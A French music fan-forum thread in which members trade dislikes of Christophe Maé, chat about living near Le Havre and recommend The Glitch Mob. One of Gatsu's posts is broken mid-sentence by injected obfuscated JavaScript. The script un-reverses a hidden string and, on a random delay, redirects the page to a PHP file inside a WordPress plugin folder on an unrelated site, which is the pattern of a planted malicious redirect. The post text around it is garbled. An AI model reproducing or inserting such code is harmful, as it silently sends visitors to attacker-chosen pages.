Votre style musical

Pour discuter de vos groupes favoris
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Votre style musical

Message par Septine Madrona »

Ah! Moi aussi je déteste Christophe Maé et sa voix horripilante! Pareil pour Ben l'Oncle Soul, il me saoule ouais! :evil:
Image
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Re: Votre style musical

Message par Lloyd »

T'es Havrais Gatsu??
Image
Avatar du membre
Gatsu
Dragon aux Yeux Rouges
Dragon aux Yeux Rouges
Messages : 46
Enregistré le : 11 mars 2009, 16:19

Re: Votre style musical

Message par Gatsu »

Yup je suis du havre , toi aussi ? :) ( jvois que t'es norm$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and )
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Re: Votre style musical

Message par Lloyd »

Je suis pas loin du Havre, environ 30min de chez moi mais je compte déménager sur Rouen.
Image
Avatar du membre
Gatsu
Dragon aux Yeux Rouges
Dragon aux Yeux Rouges
Messages : 46
Enregistré le : 11 mars 2009, 16:19

Re: Votre style musical

Message par Gatsu »

Ah tu habitais ou ? Le Havre ca deviens la misère en ce moment a cause de tous les travaux ... Bon pour en revenir sur un sujet qui ressemble plus ou moins au titre initial y'as un groupe que j'aime particulièrement qui s'appelle The Glitch Mob, je vous le conseille.
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Re: Votre style musical

Message par Lloyd »

Je connais mais je ne crois pas avoir écouté leur album, mais c'est bien le groupe composé de plusieurs DJ dont celui de EdiT? j'adore son album "Certified Air Raid Material" (même si je suis pas fan du chant) niveau electro c'est puissant!

Est ce que les chanson de l'album de The Glitch Mob sont celles qui ont été utilisé pour les prestations de "Fighting Gravity" pendant America's got Talents? Si c'est ca je suis fan :D
Image
Avatar du membre
Gatsu
Dragon aux Yeux Rouges
Dragon aux Yeux Rouges
Messages : 46
Enregistré le : 11 mars 2009, 16:19

Re: Votre style musical

Message par Gatsu »

Oui c'est ca ! Leur premiere prestation était sur le morceau Drive It Like You Stole It il me semble ;) , et c'est aussi eux qui font parti d' EdiT mais personnellement je trouve The Glitch Mob beaucoup mieux !
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Re: Votre style musical

Message par Lloyd »

Ben je connais plusieurs pistes des DJs quand ils étaient en solo (Edit, Ooah et Boreta) et c'est deja bien sympa, j'ai hâte d'écouter leur productions en tant que The Glitch Mob !!! Le peu que j'ai entendu sur Fighting Gravity j'ai kiffé :p

Tu devrais carrément faire un article sur eux dans la catégorie Musique car la on squatte l'espace de discution générale sur la musique ^^
Image
Répondre